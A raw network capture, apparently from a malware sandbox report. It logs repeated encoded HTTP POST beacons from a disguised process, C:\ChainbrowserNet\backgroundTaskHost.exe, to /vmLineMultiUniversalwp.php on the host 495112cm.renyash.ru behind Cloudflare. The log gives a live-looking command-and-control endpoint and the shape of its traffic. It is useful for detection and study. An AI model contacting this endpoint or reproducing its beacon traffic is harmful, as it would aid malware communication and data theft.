                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:49.767381907 CET | 2520 | OUT | Data Raw: 54 5c 5e 56 50 59 5a 51 5c 5b 52 58 57 5c 58 5d 58 51 5a 59 52 55 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\^VPYZQ\[RXW\X]XQZYRUQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A*:7D7;=Q&#(*95=9Y&=87.P+3?6$4["*+!Y#!Y,>
                                                                                          Jan 4, 2025 11:08:49.873485088 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:50.049874067 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zArjRmase5%2FBvYGQ4aV1Vezz6eLe6NrU8aTkm5vUOy0%2Fk1nBfn1gyeLn0ASWMQ0pThvlVibFlHzBlcT1GTMo61HhSDcl0QqHMe%2BrRBIuLpqF5i7ynylWCUdqnDEqi2zI3d14Ex96"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6df76ef0c3f3-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4658&min_rtt=1542&rtt_var=6810&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=55154&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          86 | 192.168.2.4 | 50094 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:50.181658030 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:50.529908895 CET | 2520 | OUT | Data Raw: 54 50 5e 52 55 5c 5f 53 5c 5b 52 58 57 5b 58 52 58 5d 5a 53 52 5c 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP^RU\_S\[RXW[XRX]ZSR\QW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.=97C7=% 'Y*?-X"-1Y$>7%?<+4[-)+!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:50.625442982 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:50.801491022 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVQwgpImxFLc3GjGmsednpNn%2FzA7x%2BMflJvq6uW9tkYLRNeByA7tb0w33J5R5EHoEEaP6S6l7v5IxkaMuiIqdA2%2F2WDypT38pIIXVhoB2gct2%2FOR6w1meXgb1ArW%2FJHL92ZEstwn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dfc2f4641e9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4048&min_rtt=1708&rtt_var=5322&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=71446&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          87 | 192.168.2.4 | 50095 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:50.946079969 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:51.295506001 CET | 2520 | OUT | Data Raw: 54 5e 5b 50 50 5f 5a 5d 5c 5b 52 58 57 5f 58 5c 58 54 5a 5b 52 50 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^[PP_Z]\[RXW_X\XTZ[RPQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=94 =W&3>5%X$>V (<3?584>:[)!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:51.392688036 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:51.561614037 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:51 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFWP90IfdZI8tKroF69ZC48tsZh6XWZ9qfVpLwyYsy1sD22K%2Bx9VB%2F3pRix5aVqM%2FuCZK4tK0M0RPbSpWanEydF9hZYyT3pnhhraNTn0HKNXoDnssIh8DLYv1VLoYZ6WF%2FME0iGK"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e00efc80f81-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3717&min_rtt=1483&rtt_var=5025&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=75417&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          88 | 192.168.2.4 | 50096 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:51.691906929 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          89 | 192.168.2.4 | 50097 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:52.304250002 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:52.654879093 CET | 1844 | OUT | Data Raw: 54 59 5e 56 50 58 5a 56 5c 5b 52 58 57 5e 58 5d 58 54 5a 5a 52 5c 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^VPXZV\[RXW^X]XTZZR\QZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@*)'D4;!W'0 )1Z!.6&-?P -?/<\ %>!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:52.749561071 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:53.003010988 CET | 952 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:52 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hW8fWFAjUzGEdplCl81aZbDGW1oYlWbtVje9NGB3V5quQAWBsQUrtFNNSOqLvkpTgH7EjtEeqRnUMIjwmyjCtyBWEzzy606Q8ZprFUUaqdc%2FGKlwYJka%2FB8KB4txqJl5zqvHPWxc"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e096aa14225-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8719&min_rtt=2368&rtt_var=13591&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=27453&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0e 2b 2d 27 0f 21 11 28 11 3d 3d 2d 06 26 23 2c 5e 2c 32 37 19 23 12 3f 5b 38 54 26 03 24 20 28 15 3d 01 38 55 34 30 20 0e 24 20 2a 5d 06 12 3b 01 2b 3c 2e 5c 26 15 0c 55 29 22 2a 40 30 36 0b 03 24 2e 23 5a 3c 3c 29 5f 32 05 22 0c 29 2f 2e 10 2e 03 20 08 38 3c 34 12 36 03 21 53 08 13 23 0e 25 1f 2c 0d 28 20 31 59 31 0a 3e 04 26 3a 34 0f 2a 16 06 16 27 3d 22 5a 2d 0f 20 05 28 0d 24 5b 2e 3d 27 03 28 00 30 0f 24 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'+-'!(==-&#,^,27#?[8T&$ (=8U40 $ *];+<.\&U)"*@06$.#Z<<)_2")/.. 8<46!S#%,( 1Y1>&:4*'="Z- ($[.='(0$"\ #V=WL0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          90 | 192.168.2.4 | 50098 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:52.304472923 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:52.655009985 CET | 2520 | OUT | Data Raw: 54 5c 5e 52 55 5d 5a 55 5c 5b 52 58 57 52 58 5b 58 51 5a 5b 52 56 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\^RU]ZU\[RXWRX[XQZ[RVQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A*"8>2#X=<&#>=$-+R#6+,/]+&;#[2);!Y#!Y,
                                                                                          Jan 4, 2025 11:08:52.749078035 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:53.021141052 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:52 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9lHtBVjnrDhzPgfxRFxgu1d0fOJHRAEnVqBc1H81JVCaXpOio5poqrYQlsq9gETtbaxzwznslAjCGmSpgk4P998kTgvSJvRWjkI6wqfclGDf1baDJZwPh8xMEEDJUyVGpN2%2FD1oG"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e0968924370-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8577&min_rtt=2144&rtt_var=13670&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=27234&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          91 | 192.168.2.4 | 50099 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:53.149118900 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:53.498752117 CET | 2516 | OUT | Data Raw: 51 59 5b 54 50 5f 5f 53 5c 5b 52 58 57 5a 58 5c 58 57 5a 53 52 55 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY[TP__S\[RXWZX\XWZSRUQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@=D (6%$=1#=5]&.3R7=6R+,+674-++!Y#!Y,>
                                                                                          Jan 4, 2025 11:08:53.596801996 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:53.775728941 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:53 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q91bVlKSs6Ewcz0eN2TM05MyIKIk5cM67Br2mwrKGFqSlvNozPXg8PLrX4%2B9BUXIyO52o2NvEnrQU2hgtw7GCw6P1TkxnhDfv3UL6FBp29krR6XZDYze2PeiQr2lGczfzFuzgyrB"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e0eba7e4297-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3866&min_rtt=1728&rtt_var=4925&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2809&delivery_rate=77502&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          92 | 192.168.2.4 | 50100 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:53.907970905 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:54.264627934 CET | 2520 | OUT | Data Raw: 54 5e 5e 50 55 59 5a 5c 5c 5b 52 58 57 5f 58 5f 58 53 5a 5f 52 57 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^^PUYZ\\[RXW_X_XSZ_RWQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-= "821 =<)#=&-7P#>R+<(&8#-=*+!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:54.375998974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:54.553056955 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:54 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FZwu7bOxw7gEe9LwXMefRB3ne6Pg%2FSotoChVnDTVqK4Fpd1jtfihlVxBOOxO%2BnizmYKEwEnixLETt4Hp31SyaQFNoAsA4Y3IYfqbN9DX%2FBkpZ9Vi0PhsTybSEGLOlKzMQSlIbm3y"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e1388c042a6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4602&min_rtt=1721&rtt_var=6407&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=58942&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          93 | 192.168.2.4 | 50101 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:54.845889091 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:55.201858044 CET | 2520 | OUT | Data Raw: 51 5e 5e 5f 55 5e 5a 54 5c 5b 52 58 57 59 58 5c 58 5c 5a 5f 52 52 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^^_U^ZT\[RXWYX\X\Z_RRQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-(*?A"8%V%37=,1Y!'.#!<?<(@'4[:)+!Y#!Y,*
                                                                                          Jan 4, 2025 11:08:55.310425043 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:55.581310034 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:55 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DacNiJxWQ5VyOrlkYeHih8MBLAzaAFcHzD5fpHic2xvh7u7L%2BWfSs782Nzw8h0zps3JgKd%2BkLrsPfWRsjTq%2FFu%2F8F%2BKPGC7Tuh9HtVIT6dLSGBBTVUuqnawDJZXS6Th86tqNuTMS"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e196ce4435c-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2850&min_rtt=1619&rtt_var=3069&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=127310&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          94 | 192.168.2.4 | 50102 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:55.706701040 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:56.063196898 CET | 2520 | OUT | Data Raw: 54 5b 5e 5e 55 5d 5a 56 5c 5b 52 58 57 52 58 5a 58 53 5a 5c 52 52 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[^^U]ZV\[RXWRXZXSZ\RRQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D=,4^6%#^(<["[=X0#4.!(,'Y(&##=*!Y#!Y,
                                                                                          Jan 4, 2025 11:08:57.109533072 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:57.109603882 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:57.109710932 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mv7a8ee5FN%2Fo3KnpULn7seTVO%2BFP%2FuBHNNwVLaJP5gES5Az0DGRGxho%2FpJVuvRQZvFCGDoIGyH6Ma3qkG2vyL4GxuZyXmUKpNEHGVd8MHtl%2F5FbTpSMrJkRxgId1uhOND1Evb8GL"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
